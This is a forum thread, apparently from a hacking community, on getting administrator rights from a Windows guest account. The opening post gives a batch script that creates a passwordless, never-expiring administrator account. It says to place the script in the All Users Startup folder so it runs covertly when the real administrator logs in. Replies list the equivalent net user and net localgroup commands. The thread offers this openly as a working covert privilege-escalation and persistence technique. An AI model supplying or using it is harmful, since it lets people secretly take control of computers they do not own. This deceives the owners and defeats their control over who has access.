Create a New admin account using the Guest account

2
To create an administrator account using the guest account is easy. Just
follow the steps :
Open Notepad, paste the following :
Code:
@echo off
net user Newadmin /add /expires:never /passwordreq:no


net localgroup “Administrators” /add Newadmin

And save it to a bat file.

Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup

And when your admin logs into the system, the new account will be
automatically created without the notice of the user. Next time when you
login, you will get the user account for you.
[Image: An9XX.gif]
no need of this
you can create this in cmd anyway
so, why follow long process
[Image: An9XX.gif]
Yep! I agree with ssparikshya!
V can do it in Cmd itslf..
To create new user
Code:
net user username /ADD
To check Group
Code:
net localgroup
To provided Admin power
Code:
net localgroup administrators username /ADD
To delete
Code:
net user username /DELETE
[Image: jRHNJwz.gif]
Interest-Involvement-Implementation
Share-Learn-Respect-Repute-Thank

    Create a New admin account using the Guest account